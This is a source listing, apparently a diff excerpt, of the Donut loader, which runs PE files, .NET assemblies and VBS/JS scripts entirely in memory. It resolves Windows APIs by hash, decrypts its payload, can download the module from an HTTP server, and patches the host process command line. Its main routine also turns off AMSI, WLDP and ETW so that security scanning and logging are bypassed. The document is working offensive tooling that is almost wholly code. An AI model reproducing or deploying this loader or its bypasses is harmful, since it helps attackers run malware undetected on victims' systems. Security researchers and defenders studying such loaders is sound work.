443 // DebugBreak();
444
445 if(callbacks) {
446 while(*callbacks != NULL) {
447 // call function
448 DPRINT("Calling 0x%p", *callbacks);
449 (*callbacks)((LPVOID)cs, DLL_PROCESS_ATTACH, NULL);
450 callbacks++;
451 }
452 }
453 }
454
455 //system("pause");
456
457 if(mod->type == DONUT_MODULE_DLL) {
458 DPRINT("Executing entrypoint of DLL\n\n");
459 DllMain = RVA2VA(DllMain_t, cs, ntc.OptionalHeader.AddressOfEntryPoint);
460 DllMain(cs, DLL_PROCESS_ATTACH, NULL);
461
462 // call exported api?
463 if(mod->method[0] != 0) {
464 DPRINT("Resolving address of %s", (char*)mod->method);
465
466 rva = ntc.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
467 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
468
469 if(rva != 0) {
470 cnt = exp->NumberOfNames;
471
472 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
473
474 if(cnt != 0) {
475 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
476 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
477 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
478
479 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfFunctions : 0x%X", *adr);
480 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfNames : 0x%X", *sym);
481 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals : 0x%X", *ord);
482
483 do {
484 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
485 if(!_strcmp(str, mod->method)) {
486 DllParam = RVA2VA(DllParam_t, cs, adr[ord[cnt-1]]);
487 break;
488 }
489 } while (--cnt);
490
491 // resolved okay?
492 if(DllParam != NULL) {
493 DPRINT("Invoking %s", mod->method);
494 // pass parameters/command line to function?
495 if(mod->args[0] != 0) {
496 if(mod->unicode) {
497 ansi2unicode(inst, mod->args, buf);
498 }
499 DllParam((mod->unicode) ? (PVOID)buf : (PVOID)mod->args);
500 } else {
501 // execute DLL function with no parameters
502 DllVoid = (DllVoid_t)DllParam;
503 DllVoid();
504 }
505 } else {
506 DPRINT("Unable to resolve API");
507 goto pe_cleanup;
508 }
509 }
510 }
511 }
512 } else {
513
514 // set the command line
515 if(mod->args[0] != 0) {
516 ansi2unicode(inst, mod->args, buf);
517 DPRINT("Setting command line: %ws", buf);
518 SetCommandLineW(inst, buf);
519 }
520
521 if(mod->thread != 0) {
522 // Create a new thread for this process.
523 // Since we replaced exit-related API with RtlExitUserThread in IAT, once an exit-related API is called, the
524 // thread will simply terminate and return back here. Of course, this doesn't work
525 // if the exit-related API is resolved dynamically.
526 DPRINT("Creating thread for entrypoint of EXE : %p", (PVOID)Start);
527 status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)Start, NULL, 0, 0, 0, 0, NULL, syscall_list);
528
529 if(NT_SUCCESS(status)) {
530 // wait for thread to terminate
531 status = NtWaitForSingleObject(hThread, FALSE, NULL, syscall_list);
532 DPRINT("NTSTATUS: 0x%lx", status);
533 if (!NT_SUCCESS(status)) return;
534 DPRINT("Process terminated");
535 }
536 } else {
537 // if ExitProces is called, this will terminate the host process.
538 DPRINT("Executing entrypoint");
539 Start(NtCurrentTeb()->ProcessEnvironmentBlock);
540 }
541 }
542 pe_cleanup:
543 // if memory allocated
544 if(cs != NULL) {
545 // release
546 DPRINT("Releasing memory");
547 rs = 0;
548 status = NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&shcp, &rs, MEM_RELEASE, syscall_list);
549 DPRINT("NTSTATUS: 0x%lx", status);
550 if (!NT_SUCCESS(status)) return;
551 status = NtUnmapViewOfSection(NtCurrentProcess(), cs, syscall_list);
552 DPRINT("NTSTATUS: 0x%lx", status);
553 if (!NT_SUCCESS(status)) return;
554 NtClose(hSection, syscall_list);
555 }
556 }
557
558 // check each exit-related api with name provided
559 // return TRUE if found, else FALSE
560 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name) {
561 PCHAR str;
562 CHAR api[128];
563 INT i;
564
565 str = inst->exit_api;
566
567 for(;;) {
568 // store string until null byte or semi-colon encountered
569 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) api[i] = str[i];
570 // nothing stored? end
571 if(i == 0) break;
572 // skip name plus one for separator
573 str += (i + 1);
574 // store null terminator
575 api[i] = '\0';
576 // if equal, return TRUE
577 if(!_strcmp(api, name)) return TRUE;
578 }
579 return FALSE;
580 }
581
582 // returns TRUE if ptr is heap memory
583 BOOL IsHeapPtr(PDONUT_INSTANCE inst, LPVOID ptr) {
584 MEMORY_BASIC_INFORMATION mbi;
585 DWORD res;
586 NTSTATUS status;
587 PSYSCALL_LIST syscall_list;
588
589 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
590
591 if(ptr == NULL) return FALSE;
592
593 // query the pointer
594 status = NtQueryVirtualMemory(NtCurrentProcess(), ptr, MemoryBasicInformation, &mbi, sizeof(mbi), NULL, syscall_list);
595 if (!NT_SUCCESS(status)) return FALSE;
596
597 return ((mbi.State == MEM_COMMIT ) &&
598 (mbi.Type == MEM_PRIVATE ) &&
599 (mbi.Protect == PAGE_READWRITE));
600 }
601
602 // Set the command line for host process.
603 //
604 // This replaces kernelbase!BaseUnicodeCommandLine and kernelbase!BaseAnsiCommandLine
605 // that kernelbase!KernelBaseDllInitialize reads from NtCurrentPeb()->ProcessParameters->CommandLine
606 //
607 // BOOL KernelBaseDllInitialize(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
608 //
609 // Only tested on windows 10, but should work with at least windows 7
610 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR CommandLine) {
611 PIMAGE_DOS_HEADER dos;
612 PIMAGE_NT_HEADERS nt;
613 PIMAGE_SECTION_HEADER sh;
614 DWORD i, cnt;
615 PULONG_PTR ds;
616 HMODULE m;
617 ANSI_STRING ansi;
618 PANSI_STRING mbs;
619 PUNICODE_STRING wcs;
620 PPEB peb;
621 PPEB_LDR_DATA ldr;
622 PLDR_DATA_TABLE_ENTRY dte;
623 PRTL_USER_PROCESS_PARAMETERS upp;
624 BOOL bSet = FALSE;
625 CHAR **argv;
626 WCHAR **wargv;
627 p_acmdln_t p_acmdln;
628 p_wcmdln_t p_wcmdln;
629 CHAR sym[128];
630 PCHAR str;
631 INT fptr, atype;
632 PVOID addr, wcmd, acmd;
633
634 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
635 upp = peb->ProcessParameters;
636
637 DPRINT("Obtaining handle for %s", inst->kernelbase);
638 m = inst->api.GetModuleHandle(inst->kernelbase);
639 dos = (PIMAGE_DOS_HEADER)m;
640 nt = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
641 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
642 nt->FileHeader.SizeOfOptionalHeader);
643
644 // locate the .data segment, save VA and number of pointers
645 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
646 if(*(PDWORD)sh[i].Name == *(PDWORD)inst->dataname) {
647 ds = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
648 cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
649 break;
650 }
651 }
652
653 DPRINT("Searching %i pointers", cnt);
654
655 wcmd = inst->api.GetCommandLineW();
656
657 for(i=0; i<cnt; i++) {
658 wcs = (PUNICODE_STRING)&ds[i];
659 // skip if not equal
660 if(wcs->Buffer != wcmd) continue;
661 DPRINT("BaseUnicodeCommandLine found at %p:%p : %ws", &ds[i], wcs->Buffer, wcs->Buffer);
662 // overwrite buffer for GetCommandLineW
663 inst->api.RtlCreateUnicodeString(wcs, CommandLine);
664 DPRINT("GetCommandLineW() : %ws", GetCommandLineW());
665 break;
666 }
667
668 acmd = inst->api.GetCommandLineA();
669
670 for(i=0; i<cnt; i++) {
671 mbs = (PANSI_STRING)&ds[i];
672 // skip if not equal
673 if(mbs->Buffer != acmd) continue;
674 DPRINT("BaseAnsiCommandLine found at %p:%p : %s", &ds[i], mbs->Buffer, mbs->Buffer);
675 inst->api.RtlUnicodeStringToAnsiString(&ansi, wcs, TRUE);
676 Memcpy(&ds[i], &ansi, sizeof(ANSI_STRING));
677 DPRINT("GetCommandLineA() : %s", GetCommandLineA());
678 break;
679 }
680
681 ldr = (PPEB_LDR_DATA)peb->Ldr;
682
683 // for each DLL loaded
684 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
685 dte->DllBase != NULL;
686 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
687 {
688 // check for exported symbols and patch according to string type
689 str = (PCHAR)inst->cmd_syms;
690
691 for(;;) {
692 // reset flags
693 atype = 1; fptr = 0;
694 // store string until null byte or semi-colon encountered
695 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) {
696 // w indicates unicode type
697 if(str[i] == 'w') atype = 0;
698 // p indicates function pointer
699 if(str[i] == 'p') fptr = 1;
700 // store byte
701 sym[i] = str[i];
702 }
703 // nothing stored? end loop for this DLL
704 if(i == 0) break;
705 // skip name plus one for separator
706 str += (i + 1);
707 // store null terminator
708 sym[i] = '\0';
709 // see if it can be resolved for current module
710 addr = xGetProcAddress(inst, dte->DllBase, sym, 0);
711 // nothing resolve? get the next symbol from list
712 if(addr == NULL) continue;
713 // is this ansi?
714 if(atype) {
715 argv = (PCHAR*)addr;
716 // pointer?
717 if(fptr != 0) {
718 p_acmdln = (p_acmdln_t)addr;
719 argv = p_acmdln();
720 }
721 // anything to patch?
722 DPRINT("Checking %s", sym);
723 if(argv != NULL && IsHeapPtr(inst, *argv)) {
724 DPRINT("Setting %ws!%s \"%s\" to \"%s\"",
725 dte->BaseDllName.Buffer, sym, *argv, ansi.Buffer);
726 *argv = ansi.Buffer;
727 }
728 } else {
729 wargv = (PWCHAR*)addr;
730 // pointer?
731 if(fptr != 0) {
732 p_wcmdln = (p_wcmdln_t)addr;
733 wargv = p_wcmdln();
734 }
735 // anything to patch?
736 DPRINT("Checking %s", sym);
737 if(wargv != NULL && IsHeapPtr(inst, *wargv)) {
738 DPRINT("Setting %ws!%s \"%ws\" to \"%ws\"",
739 dte->BaseDllName.Buffer, sym, *wargv, wcs->Buffer);
740 *wargv = wcs->Buffer;
741 }
742 }
743 }
744 }
745 return TRUE;
746 }
+157
-0
loader/inmem_script.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IActiveScriptSiteWindowVtbl siteWnd_vtbl;
38 IHostVtbl wscript_vtbl;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43 WCHAR buf[DONUT_MAX_NAME+1];
44 SIZE_T rs;
45 NTSTATUS status;
46 PSYSCALL_LIST syscall_list;
47
48 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
49
50 // 1. Allocate memory for unicode format of script
51 rs = (inst->mod_len + 1) * sizeof(WCHAR);
52 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&script, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
53
54 // 2. Convert string to unicode.
55 if(NT_SUCCESS(status)) {
56 // 2. Convert string to unicode.
57 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
58 -1, script, mod->len * sizeof(WCHAR));
59
60 // setup the IActiveScriptSite interface
61 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
62 ActiveScript_New(inst, &mas.site);
63
64 // setup the IActiveScriptSiteWindow interface for GUI stuff
65 mas.siteWnd.lpVtbl = (IActiveScriptSiteWindowVtbl*)&siteWnd_vtbl;
66 ActiveScriptSiteWindow_New(inst, &mas.siteWnd);
67
68 // setup the IHost interface for WScript object
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 // 4. Initialize COM, MyIActiveScriptSite
73 DPRINT("CoInitializeEx");
74 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
75
76 if(hr == S_OK) {
77 // 5. Instantiate the active script engine
78 DPRINT("CoCreateInstance(IID_IActiveScript)");
79
80 hr = inst->api.CoCreateInstance(
81 &inst->xCLSID_ScriptLanguage, 0,
82 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
83 &inst->xIID_IActiveScript, (void **)&engine);
84
85 if(hr == S_OK) {
86 // 6. Get IActiveScriptParse object from engine
87 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
88
89 hr = engine->lpVtbl->QueryInterface(
90 engine,
91 #ifdef _WIN64
92 &inst->xIID_IActiveScriptParse64,
93 #else
94 &inst->xIID_IActiveScriptParse32,
95 #endif
96 (void **)&parser);
97
98 if(hr == S_OK) {
99 // 7. Initialize parser
100 DPRINT("IActiveScriptParse::InitNew");
101 hr = parser->lpVtbl->InitNew(parser);
102
103 if(hr == S_OK) {
104 // 8. Set custom script interface
105 DPRINT("IActiveScript::SetScriptSite");
106 mas.wscript.lpEngine = engine;
107
108 hr = engine->lpVtbl->SetScriptSite(
109 engine, (IActiveScriptSite *)&mas);
110
111 if(hr == S_OK) {
112 DPRINT("IActiveScript::AddNamedItem(\"%s\")", inst->wscript);
113 ansi2unicode(inst, inst->wscript, buf);
114 obj = inst->api.SysAllocString(buf);
115 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
116 inst->api.SysFreeString(obj);
117
118 if(hr == S_OK) {
119 // 9. Load script
120 DPRINT("IActiveScriptParse::ParseScriptText");
121 hr = parser->lpVtbl->ParseScriptText(
122 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
123
124 if(hr == S_OK) {
125 // 10. Run script
126 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
127 hr = engine->lpVtbl->SetScriptState(
128 engine, SCRIPTSTATE_CONNECTED);
129
130 // SetScriptState blocks here
131 }
132 }
133 }
134 }
135 DPRINT("IActiveScriptParse::Release");
136 parser->lpVtbl->Release(parser);
137 }
138 DPRINT("IActiveScript::Close");
139 engine->lpVtbl->Close(engine);
140
141 DPRINT("IActiveScript::Release");
142 engine->lpVtbl->Release(engine);
143 }
144 }
145 DPRINT("Erasing script from memory");
146 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
147
148 DPRINT("NtFreeVirtualMemory(script)");
149 rs = 0;
150 status = NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&script, &rs, MEM_RELEASE, syscall_list);
151 DPRINT("NTSTATUS: 0x%lx", status);
152 }
153 }
154
155 #include "activescript.c"
156 #include "wscript.c"
+452
-0
loader/loader.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "loader.h"
32
33 DWORD MainProc(PDONUT_INSTANCE inst);
34
35 HANDLE DonutLoader(PDONUT_INSTANCE inst) {
36 CreateThread_t _CreateThread;
37 GetThreadContext_t _GetThreadContext;
38 GetCurrentThread_t _GetCurrentThread;
39 NtContinue_t _NtContinue;
40 ULONG64 hash;
41 HANDLE h = NULL;
42 CONTEXT c;
43
44 DPRINT("sizeof(DONUT_INSTANCE) : %zu\n", sizeof(DONUT_INSTANCE));
45 DPRINT("offsetof(DONUT_INSTANCE, api) : %zu\n", offsetof(DONUT_INSTANCE, api));
46
47 // create thread and execute original entrypoint?
48 if(inst->oep != 0) {
49 DPRINT("Resolving address of CreateThread");
50 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CreateThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
51 _CreateThread = (CreateThread_t)xGetProcAddressByHash(inst, hash, inst->iv);
52
53 // api resolved?
54 if(_CreateThread != NULL) {
55 // create new thread
56 DPRINT("Creating new thread");
57 h = _CreateThread(NULL, 0, ADR(LPTHREAD_START_ROUTINE, MainProc), (LPVOID)inst, 0, NULL);
58 } else {
59 DPRINT("FAILED");
60 return (HANDLE)-1;
61 }
62
63 DPRINT("Resolving address of GetCurrentThread");
64 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetCurrentThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
65 _GetCurrentThread = (GetCurrentThread_t)xGetProcAddressByHash(inst, hash, inst->iv);
66
67 if(_NtContinue != NULL && _GetThreadContext != NULL && _GetCurrentThread != NULL) {
68 c.ContextFlags = CONTEXT_FULL;
69 _GetThreadContext(_GetCurrentThread(), &c);
70 #ifdef _WIN64
71 c.Rip = inst->oep;
72 c.Rsp &= -16;
73 #else
74 c.Eip = inst->oep;
75 c.Esp &= -4;
76 #endif
77 DPRINT("Calling NtContinue");
78 //__debugbreak();
79 _NtContinue(&c, FALSE);
80 }
81 } else {
82 // execute in existing thread
83 MainProc(inst);
84 }
85 return h;
86 }
87
88 DWORD MainProc(PDONUT_INSTANCE inst) {
89 ULONG i, ofs, wspace, fspace, len;
90 ULONG64 sig;
91 DONUT_ASSEMBLY assembly;
92 PDONUT_MODULE mod, unpck;
93 VirtualAlloc_t _VirtualAlloc;
94 VirtualFree_t _VirtualFree;
95 RtlExitUserProcess_t _RtlExitUserProcess;
96 LPVOID pv, ws;
97 ULONG64 hash;
98 BOOL disabled, term;
99 NTSTATUS nts;
100 PCHAR str;
101 CHAR path[MAX_PATH];
102 NTSTATUS status;
103 SIZE_T rs;
104 PSYSCALL_LIST syscall_list;
105
106 DPRINT("Maru IV : %" PRIX64, inst->iv);
107
108 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
109 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
110 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddressByHash(inst, hash, inst->iv);
111
112 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
113 DPRINT("Resolving address for VirtualFree() : %" PRIX64, hash);
114 _VirtualFree = (VirtualFree_t) xGetProcAddressByHash(inst, hash, inst->iv);
115
116 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.RtlExitUserProcess) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
117 DPRINT("Resolving address for RtlExitUserProcess() : %" PRIX64, hash);
118 _RtlExitUserProcess = (RtlExitUserProcess_t) xGetProcAddressByHash(inst, hash, inst->iv);
119
120 // failed to resolve any?
121 if(_VirtualAlloc == NULL ||
122 _VirtualFree == NULL ||
123 _RtlExitUserProcess == NULL)
124 {
125 DPRINT("FAILED!.");
126 return -1;
127 }
128
129 DPRINT("VirtualAlloc : %p VirtualFree : %p",
130 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
131
132 DPRINT("Allocating %i bytes of RW memory", inst->len);
133 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
134
135 if(pv == NULL) {
136 DPRINT("Memory allocation failed...");
137 // terminate host process?
138 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
139 DPRINT("Terminating host process");
140 _RtlExitUserProcess(0);
141 }
142 return -1;
143 }
144 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
145 Memcpy(pv, inst, inst->len);
146 inst = (PDONUT_INSTANCE)pv;
147
148 DPRINT("Zero initializing PDONUT_ASSEMBLY");
149 Memset(&assembly, 0, sizeof(assembly));
150
151 // if encryption used
152 if(inst->entropy == DONUT_ENTROPY_DEFAULT) {
153 PBYTE inst_data;
154 // load pointer to data just past len + key
155 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
156
157 DPRINT("Decrypting %li bytes of instance", inst->len - offsetof(DONUT_INSTANCE, api_cnt));
158
159 donut_decrypt(inst->key.mk,
160 inst->key.ctr,
161 inst_data,
162 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
163
164 DPRINT("Generating hash to verify decryption");
165 ULONG64 mac = maru(inst->sig, inst->iv);
166 DPRINT("Instance : %"PRIX64" | Result : %"PRIX64, inst->mac, mac);
167
168 if(mac != inst->mac) {
169 DPRINT("Decryption of instance failed");
170 goto erase_memory;
171 }
172 }
173 DPRINT("Resolving LoadLibraryA");
174
175 inst->api.addr[0] = xGetProcAddressByHash(inst, inst->api.hash[0], inst->iv);
176 if(inst->api.addr[0] == NULL) return -1;
177
178 str = (PCHAR)inst->dll_names;
179
180 // load the DLL required
181 for(;;) {
182 // store string until null byte or semi-colon encountered
183 for(i=0; str[i] != '\0' && str[i] !=';' && i<MAX_PATH; i++) path[i] = str[i];
184 // nothing stored? exit loop
185 if(i == 0) break;
186 // skip name plus one for separator
187 str += (i + 1);
188 // store null terminator
189 path[i] = '\0';
190 xGetLibAddress(inst, path);
191 }
192
193 DPRINT("Resolving %i API", inst->api_cnt);
194
195 for(i=1; i<inst->api_cnt; i++) {
196 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
197
198 inst->api.addr[i] = xGetProcAddressByHash(inst, inst->api.hash[i], inst->iv);
199
200 // if resolving API failed
201 if(inst->api.addr[i] == NULL) {
202 DPRINT("Failed to resolve an API");
203 // make an exception for CLRCreateInstance
204 // for older versions of dotnet
205 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CLRCreateInstance) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
206
207 if(inst->api.hash[i] == hash) {
208 DPRINT("CLRCreateInstance isn't available. Will try CorBindToRuntime.");
209 continue;
210 }
211 // else, bail out
212 goto erase_memory;
213 }
214 }
215
216 if(inst->type == DONUT_INSTANCE_HTTP) {
217 DPRINT("Module is stored on remote HTTP server.");
218 if(!DownloadFromHTTP(inst)) goto erase_memory;
219 mod = inst->module.p;
220 } else
221 if(inst->type == DONUT_INSTANCE_DNS) {
222 DPRINT("Module is stored on remote DNS server. (Currently unsupported)");
223 goto erase_memory;
224 //if(!DownloadFromDNS(inst)) goto erase_memory;
225 mod = inst->module.p;
226 } else
227 if(inst->type == DONUT_INSTANCE_EMBED) {
228 DPRINT("Module is embedded.");
229 mod = (PDONUT_MODULE)&inst->module.x;
230 }
231
232 DPRINT("Allocating the syscall table");
233 syscall_list = _VirtualAlloc(NULL, sizeof(SYSCALL_LIST), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
234 inst->syscall_list = (ULONG_PTR)syscall_list;
235 if (syscall_list == NULL) {
236 // terminate host process?
237 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
238 DPRINT("Terminating host process");
239 _RtlExitUserProcess(0);
240 }
241 return -1;
242 }
243
244 // try bypassing AMSI and WLDP?
245 if(inst->bypass != DONUT_BYPASS_NONE) {
246 // Try to disable AMSI
247 disabled = DisableAMSI(inst);
248 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
249 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
250 goto erase_memory;
251
252 // Try to disable WLDP
253 disabled = DisableWLDP(inst);
254 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
255 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
256 goto erase_memory;
257
258 // Try to disable ETW
259 disabled = DisableETW(inst);
260 DPRINT("DisableETW %s", disabled ? "OK" : "FAILED");
261 if (!disabled && inst->bypass == DONUT_BYPASS_ABORT)
262 goto erase_memory;
263 }
264
265 // module is compressed?
266 if(mod->compress != DONUT_COMPRESS_NONE) {
267 DPRINT("Compression engine is %"PRIx32, mod->compress);
268
269 DPRINT("Allocating %zd bytes of memory for decompressed file and module information",
270 mod->len + sizeof(DONUT_MODULE));
271
272 // allocate memory for module information + size of decompressed data
273 unpck = NULL;
274 rs = ((sizeof(DONUT_MODULE) + mod->len) + 4095) & -4096;
275 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&unpck, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
276
277 if(!NT_SUCCESS(status)) goto erase_memory;
278
279 // copy the existing information to new block
280 DPRINT("Duplicating DONUT_MODULE");
281 Memcpy(unpck, mod, sizeof(DONUT_MODULE));
282
283 // decompress module data into new block
284 DPRINT("Decompressing %"PRId32 " -> %"PRId32, mod->zlen, mod->len);
285
286 if(mod->compress == DONUT_COMPRESS_LZNT1 ||
287 mod->compress == DONUT_COMPRESS_XPRESS)
288 {
289 DPRINT("Decompressing with RtlDecompressBuffer(%s)",
290 mod->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" : "XPRESS");
291
292 nts = inst->api.RtlDecompressBuffer(
293 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
294 (PUCHAR)unpck->data, mod->len,
295 (PUCHAR)&mod->data, mod->zlen, &len);
296
297 if(nts == 0) {
298 // assign pointer to mod
299 mod = unpck;
300 } else {
301 DPRINT("RtlDecompressBuffer failed with %"PRIX32, nts);
302 goto erase_memory;
303 }
304 } else if(mod->compress == DONUT_COMPRESS_APLIB) {
305 DPRINT("Decompressing with aPLib");
306 aP_depack((PUCHAR)mod->data, (PUCHAR)unpck->data);
307 DPRINT("Done");
308 mod = unpck;
309 } else {
310 //
311 }
312 }
313 DPRINT("Checking type of module");
314
315 // unmanaged EXE/DLL?
316 if(mod->type == DONUT_MODULE_DLL ||
317 mod->type == DONUT_MODULE_EXE) {
318 RunPE(inst, mod);
319 } else
320 // .NET EXE/DLL?
321 if(mod->type == DONUT_MODULE_NET_DLL ||
322 mod->type == DONUT_MODULE_NET_EXE)
323 {
324 if(LoadAssembly(inst, mod, &assembly)) {
325 RunAssembly(inst, mod, &assembly);
326 }
327 FreeAssembly(inst, &assembly);
328 } else
329 // vbs or js?
330 if(mod->type == DONUT_MODULE_VBS ||
331 mod->type == DONUT_MODULE_JS)
332 {
333 RunScript(inst, mod);
334 }
335
336 erase_memory:
337 // if module was downloaded
338 if(inst->type == DONUT_INSTANCE_HTTP ||
339 inst->type == DONUT_INSTANCE_DNS)
340 {
341 if(inst->module.p != NULL) {
342 // overwrite memory with zeros
